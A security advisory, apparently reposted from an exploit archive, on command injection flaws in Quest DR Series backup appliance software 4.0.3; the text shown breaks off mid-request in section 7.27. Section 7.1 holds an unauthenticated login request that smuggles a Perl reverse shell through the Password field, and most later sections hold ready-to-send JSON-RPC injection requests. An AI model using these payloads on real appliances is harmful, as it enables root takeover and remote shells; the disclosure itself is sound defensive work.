Quest DR Series Disk Backup Software 4.0.3 Code Execution

Quest DR Series Disk Backup Software version 4.0.3 suffers from multiple code execution vulnerabilities.


MD5 | fa95a83ac5f5a79ab8497701933a0dc5

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Quest DR Series Disk Backup Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest DR Series Disk Backup Multiple Vulnerabilities
Advisory ID: CORE-2018-0002
Advisory URL:
http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with
Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges
[CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with
Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges
[CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146,
CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150,
CVE-2018-11151,
CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155,
CVE-2018-11156,
CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160,
CVE-2018-11161,
CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165,
CVE-2018-11166,
CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170,
CVE-2018-11171,
CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175,
CVE-2018-11176,
CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180,
CVE-2018-11181,
CVE-2018-11182, CVE-2018-11183, CVE-2018-11184, CVE-2018-11185,
CVE-2018-11186,
CVE-2018-11187, CVE-2018-11188, CVE-2018-11189, CVE-2018-11190,
CVE-2018-11191,
CVE-2018-11192, CVE-2018-11193, CVE-2018-11194

3. *Vulnerability Description*

Quest's website states that:

"The Quest DR Series of disk backup appliances [1] are engineered to handle
hundreds of incoming backup streams with an all-inclusive software solution
that simplifies management of backups, giving you more time to focus on
other tasks.

The appliances work in conjunction with backup software applications to
ensure data written to disks is protected for reliable recovery. New
features such as storage groups, secure erase and user management give you
the flexibility to tailor utilization policies to fit your organization's
specific requirements.

With Quest DR Series appliances, you can:

- Back up more of your servers and applications - with support for more
than 15 backup applications and enhanced security features such as
encryption at rest and secure erase.

- Store less backup data - using variable block, in-line deduplication
and compression to lower backup storage requirements by an average of
20:1 at an average cost of $.05 - $.17/GB.

- Perform better during data ingest and management - with built-in
accelerators, logical storage groups and support for Fibre Channel
connectivity and virtual tape libraries (VTLs)."

Multiple vulnerabilities were found in the Quest DR Series Disk Backup
software that would allow remote attackers to execute arbitrary system
commands on the appliance with root permissions.

Note: This advisory has limited details on the vulnerabilities because
during an attempted coordinated disclosure process for other advisory,
Quest advised us not to distribute our original findings to the public or
else they would take legal action.
Quest's definition of "responsible disclosure" can be found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is
ready and available when the vulnerability details are publicized. We
believe that providing technical details about each finding is necessary
to provide users and organizations with enough information to understand
the implications of the vulnerabilities against their environment and,
most importantly, to prioritize the remediation activities aiming at
mitigating risk.

We regret Quest's posture on disclosure and the lack of a possibility of
engaging into a coordinated publication date, something we achieve (and
have achieved) with many vendors as part of our coordinated disclosure
practices.

4. *Vulnerable Packages*

. Quest DR Series Disk Backup Software 4.0.3
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest has released the build 4.0.3.1 that address the reported
vulnerabilities.
Build can be download at:

. For DR4300e, DR4300, and DR6300:
https://support.quest.com/download-install-detail/6085865
. For DR4000, DR4100, DR6000:
https://support.quest.com/download-install-detail/6085802

For more details, Quest published the following Release Note:
https://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/

6. *Credits*

These vulnerabilities were discovered and researched by Maximiliano
Vidal from Core
Security Consulting Services. The publication of this advisory was
coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Multiple command injection vulnerabilities were found in the DR
appliance software,
which provides a web interface to manage system configuration. Clients
make use of
the site features via its exposed JSON-RPC API.

The product does only provide SSH access to
administrators inside a restricted rbash environment. Administrators are
able
to execute a small number of utilities that are mostly replicated in the
web console.

We present the most critical issue in section 7.1, which would allow a
remote
unauthenticated attacker to execute arbitrary system commands.

Sections 7.2 to 7.46 describe other command injection vectors that
require the attacker
to have a valid authentication token.

Finally, six privilege escalation vulnerabilities are described from
section 7.47
to 7.52 that would allow an attacker executing commands as the web
server user
to gain root privileges. Exploiting any of the command injection
vulnerabilities
would grant the attacker the initial foothold from where to escalate to
root.

7.1. *Unauthenticated command injection on login*

[CVE-2018-11143]
The 'Logon' method is in charge of processing login requests. It is
possible for an unauthenticated attacker to execute arbitrary commands
via the 'Password' parameter.

The following proof of concept opens a reverse shell connection to
192.168.1.36 on port 12345 musing Perl. The username must point to an
existing account on the system, so we set it to the hardcoded administrator
account that ships with the product.

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 336
Connection: close

{
"jsonrpc": "2.0",
"method": "Logon",
"params": {
"UserName": "administrator",
"Password": "';perl -e 'use
Socket;$i=\"192.168.1.36\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh
-i\");};';echo '"
},
"id": 1
}
-----/

If Active Directory support is configured, then the attacker would also
be able to inject arbitrary commands into the username field.

7.2. *Command injection in the user update method*

[CVE-2018-11144]
An authenticated attacker can craft the values of various user update
properties to execute arbitrary commands on the system.

The following proof of concept injects a 'sleep' command in the 'oldName'
parameter.

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 158
Connection: close

{
"jsonrpc": "2.0",
"method": "update",
"params": {
"classname": "DRUsers",
"user": {
"oldName": ";sleep 10; echo",
"Name": "pepito",
"oldRoles": ["PepitoRole"]
}
},
"id": 1
}
-----/

7.3. *Command injection in the user delete method*

[CVE-2018-11145]
An attacker would be able to inject system commands in the 'user' parameter
passed to the 'delete' method.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 102
Connection: close

{
"jsonrpc": "2.0",
"method": "delete",
"params": {
"classname": "DRUsers",
"user": ";sleep 10; echo "
},
"id": 1
}
-----/

7.4. *Command injection in the set user password method*

[CVE-2018-11146]
Both the 'update_pw' and 'setAdminPassword' methods can be abused to
execute arbitrary system commands.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 138
Connection: close

{
"jsonrpc": "2.0",
"method": "update_pw",
"params": {
"classname": "DRUsers",
"user": {
"Roles": ["PepeRole"],
"Name": ";sleep 10; echo "
}
},
"id": 1
}
-----/

7.5. *Command injection in the add_new_container method*

[CVE-2018-11147]
Data backed up to DR Series appliances are handled as virtual shares or
containers.

The proof of concept injects a 'sleep' command in the 'c_name' parameter
passed to the vulnerable 'add_new_container' method.

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 142
Connection: close

{
"jsonrpc": "2.0",
"method": "add_new_container",
"params": {
"classname": "DRContainers",
"connection_type": 5,
"c_name": "; sleep 10; echo "
},
"id": 1
}
-----/

7.6. *Command injection in the update_container method*

[CVE-2018-11148]
The method in charge of updating containers is also vulnerable to command
injection.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 141
Connection: close

{
"jsonrpc": "2.0",
"method": "update_container",
"params": {
"classname": "DRContainers",
"connection_type": 5,
"c_name": "; sleep 10; echo "
},
"id": 1
}
-----/

7.7. *Command injection in the setCleaner method*

[CVE-2018-11149]
The DR series administrator guide recommends performing scheduled disk
space reclamation operations as a method for recovering disk space from
the system. The subroutine in charge of setting this schedule was found
to be vulnerable to command injection.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 124
Connection: close

{
"jsonrpc": "2.0",
"method": "setCleaner",
"params": {
"classname": "DRSchedules",
"schedules": [{
"day": "; sleep 10; #"
}]
},
"id": 1
}
-----/

7.8. *Command injection in the setReplication method*

[CVE-2018-11150]
The DR Series system uses an active form of replication that lets you
configure a primary-backup scheme. The subroutine in charge of configuring
the replication schedule was found to be vulnerable to command injection.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 117
Connection: close

{
"jsonrpc": "2.0",
"method": "setReplication",
"params": {
"classname": "DRSchedules",
"container": "; sleep 10; #"
},
"id": 1
}
-----/

7.9. *Command injection in the setResetOptions method*

[CVE-2018-11151]
The DR series system GUI allows an administrator to configure password
reset options, which is basically enabling or disabling the 'Forgot your
password' link on the logon page. The subroutine that implements this
functionality was found to be vulnerable to command injection via the
'admin_email' and 'relay_host' request parameters.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 119
Connection: close

{
"jsonrpc": "2.0",
"method": "setResetOptions",
"params": {
"classname": "DRPassword",
"admin_email": "; sleep 10; #"
},
"id": 1
}
-----/

7.10. *Command injection in the set_compression method*

[CVE-2018-11152]
The appliance allows configuring several compression levels for each
storage group. The subroutine that sets the level of compression was
found to be vulnerable to command injection.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 127
Connection: close

{
"jsonrpc": "2.0",
"method": "set_compression",
"params": {
"classname": "DRCompression",
"compressionLevel": "; sleep 10; #"
},
"id": 1
}
-----/

7.11. *Command injection in the license delete method*

[CVE-2018-11153]
The JSON-RPC API exposes several methods to operate with system licenses,
several of which are vulnerable to command injection issues. The 'delete'
subroutine can be exploited by crafting the value of the 'serviceTag'
request parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 108
Connection: close

{
"jsonrpc": "2.0",
"method": "delete",
"params": {
"classname": "DRLicense",
"serviceTag": "; sleep 10; #"
},
"id": 1
}
-----/

7.12. *Command injection in the registerDR2000v method*

[CVE-2018-11154]
The 'registerDR2000v' method is part of the licensing system. This
subroutine is vulnerable to command injection via the 'LicenseServer',
'AdminName', 'Email', 'CompanyName' and 'Comments' request parameters.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 133
Connection: close

{
"jsonrpc": "2.0",
"method": "registerDR2000v",
"params": {
"classname": "DRLicense",
"dr2000v": {
"LicenseServer": "; sleep 10; #"
}
},
"id": 1
}
-----/

7.13. *Command injection in the updateRegisterDR2000v method*

[CVE-2018-11155]
The 'updateRegisterDR2000v' subroutine is yet another vulnerable method
offered by the license management API.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 139
Connection: close

{
"jsonrpc": "2.0",
"method": "updateRegisterDR2000v",
"params": {
"classname": "DRLicense",
"dr2000v": {
"LicenseServer": "; sleep 10; #"
}
},
"id": 1
}

-----/
7.14. *Command injection in the email relay host update method*

[CVE-2018-11156]
The appliance can be configured to use an external mail server for sending
email alerts. The subroutine implementing this functionality was found to
be vulnerable to command injection via the 'hostname' request parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 114
Connection: close

{
"jsonrpc": "2.0",
"method": "update",
"params": {
"classname": "DREmailRelayHost",
"hostname": "'; sleep 10; #"
},
"id": 1
}
-----/

7.15. *Command injection in the join domain method*

[CVE-2018-11157]
A DR series system can be joined to a Microsoft Active Directory Services
domain. This functionality is exposed by the 'ActiveDirectoryService'
module.
An attacker can inject system commands in the 'domain' parameter passed to
the 'join' method.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 152
Connection: close

{
"jsonrpc": "2.0",
"method": "join",
"params": {
"classname": "DRActiveDirectory",
"username": "pepe",
"password": "pepito",
"domain": "; sleep 10; #"
},
"id": 1
}
-----/

7.16. *Command injection in the add storage method*

[CVE-2018-11158]
The storage service module offers support for managing storage devices.
The 'add' method was found to be vulnerable.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
"jsonrpc": "2.0",
"method": "add",
"params": {
"classname": "DRStorage",
"service_tag": "; sleep 10; #"
},
"id": 1
}
-----/

7.17. *Command injection in the get_storage_group_statistics method*

[CVE-2018-11159]
The application provides usage statistics for each storage group, such
as capacity used, compression status, inode count, etc. In particular,
the 'group' parameter passed to the 'get_storage_group_statistics' is not
sanitized, allowing system commands to be injected.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 130
Connection: close

{
"jsonrpc": "2.0",
"method": "get_storage_group_statistics",
"params": {
"classname": "DRStorageGroup",
"group": "; sleep 10; #"
},
"id": 1
}
-----/

7.18. *Command injection in the create storage group method*

[CVE-2018-11160]
The subroutine that allows adding a new storage group was found to be
vulnerable to command injection. An attacker can inject system commands
on various request parameters, such as 'Compression_mode' and 'passphrase'.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 130
Connection: close

{
"jsonrpc": "2.0",
"method": "create",
"params": {
"classname": "DRStorageGroup",
"group": {
"Compression_mode": "; sleep 10; #"
}
},
"id": 1
}
-----/


7.19. *Command injection in the delete storage group method*

[CVE-2018-11161]
The 'delete' subroutine in the 'StorageGroupService' module passes user
generated input to the 'storage_group' system binary without sanitization,
which allows an attacker to inject system commands via the 'name' parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 107
Connection: close

{
"jsonrpc": "2.0",
"method": "delete",
"params": {
"classname": "DRStorageGroup",
"name": "; sleep 10; #"
},
"id": 1
}
-----/

7.20. *Command injection in the update storage group method*

[CVE-2018-11162]
Several request parameters are taken from the 'newGroup' dictionary when
updating a storage group and used as components of a command string without
any sanitization taking place.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 159
Connection: close

{
"jsonrpc": "2.0",
"method": "update",
"params": {
"classname": "DRStorageGroup",
"newGroup": {
"Name": "; sleep 10; #",
"Compression_mode": "pepecomprimido"
}
},
"id": 1
}
-----/

7.21. *Command injection in the set contact information method*

[CVE-2018-11163]
The GUI provides functionality to set the administrator contact information.
The 'relay_host' parameter is used as provided in the construction of a
command line string, therefore allowing attackers to inject system commands.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 143
Connection: close

{
"jsonrpc": "2.0",
"method": "set",
"params": {
"classname": "DRContactInformation",
"action": "email_alerts",
"relay_host": "'; sleep 10; #"
},
"id": 1
}
-----/

7.22. *Command injection in the generate diagnostics method*

[CVE-2018-11164]
The diagnostics page allows users to generate diagnostic logs that capture
the state of the system. An attacker authenticated within the web
application
can inject arbitrary system commands by crafting the value of the 'type'
request parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 108
Connection: close

{
"jsonrpc": "2.0",
"method": "generate",
"params": {
"classname": "DRDiagnostics",
"type": "; sleep 15; #"
},
"id": 1
}
-----/

7.23. *Command injection in the delete diagnostics method*

[CVE-2018-11165]
The 'delete' diagnostics functionality was found to be vulnerable to command
injection via the 'file_name' parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 111
Connection: close

{
"jsonrpc": "2.0",
"method": "delete",
"params": {
"classname": "DRDiagnostics",
"file_name": "; sleep 15; #"
},
"id": 1
}
-----/


7.24. *Command injection in the rescan_replica_VTL_container method*

[CVE-2018-11166]
The subroutine in charge of rescanning a VTL container replica was found to
be vulnerable to command injection via the container name parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 133
Connection: close

{
"jsonrpc": "2.0",
"method": "rescan_replica_VTL_container",
"params": {
"classname": "DRReplications",
"cname": "; sleep 10; echo "
},
"id": 1
}
-----/

7.25. *Command injection in the activate_replica_VTL_container method*

[CVE-2018-11167]
The subroutine in charge of activating a VTL container was found to be
vulnerable to command injection via the container name parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 136
Connection: close

{
"jsonrpc": "2.0",
"method": "activate_replica_VTL_container",
"params": {
"classname": "DRReplications",
"cname": "; sleep 10; echo "
},
"id": 1
}
-----/

7.26. *Command injection in the deactivate_replica_VTL_container method*

[CVE-2018-11168]
The subroutine in charge of deactivating a VTL container was also found to
be vulnerable to command injection via the container name parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 138
Connection: close

{
"jsonrpc": "2.0",
"method": "deactivate_replica_VTL_container",
"params": {
"classname": "DRReplications",
"cname": "; sleep 10; echo "
},
"id": 1
}
-----/

7.27. *Command injection in the start replication method*

[CVE-2018-11169]
The 'start' replication subroutine implements the logic to perform a
replication in an existing storage replication relationship. Arbitrary
command execution can be achieved via the 'name' parameter.

Proof of concept:

/-----
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 107
